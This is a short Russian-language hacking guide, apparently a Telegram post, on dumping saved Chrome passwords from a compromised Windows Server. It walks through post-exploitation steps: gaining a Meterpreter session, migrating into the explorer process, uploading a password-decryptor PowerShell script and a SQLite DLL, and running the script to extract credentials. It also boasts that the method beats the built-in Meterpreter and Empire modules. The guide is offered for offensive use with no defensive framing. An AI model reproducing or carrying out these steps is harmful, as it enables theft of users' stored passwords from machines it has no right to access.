Dump Chrome Passwords
https://t.me/ih_a_c_k_e_rАтакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)
Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер
2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.
Migrate:
pgrep explorer pid - ваш explorer migrate pid
Создание каталога:
mkdir Pass cd Pass
Загрузка файлов в созданный каталог (test):
upload путь к файлу на диске upload /root/CPD/Chrome_Passwords_Decryptor.ps1 upload /root/CPD/System.Data.SQLite.dll
3. Потереть ручки и выполнить следующую команду:
powershell -file Chrome_Passwords_Decryptor.ps1
Отлично, на выходе получаем вот это
P.S. Если не мигрировать, то пассов Вам не видать.
Я бы даже выделил следующие преимущества:
- Просто в исполнении.
- Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
- Не требует закрытие процесса Хром в отличии от модуля в Empire.
P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!
Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч!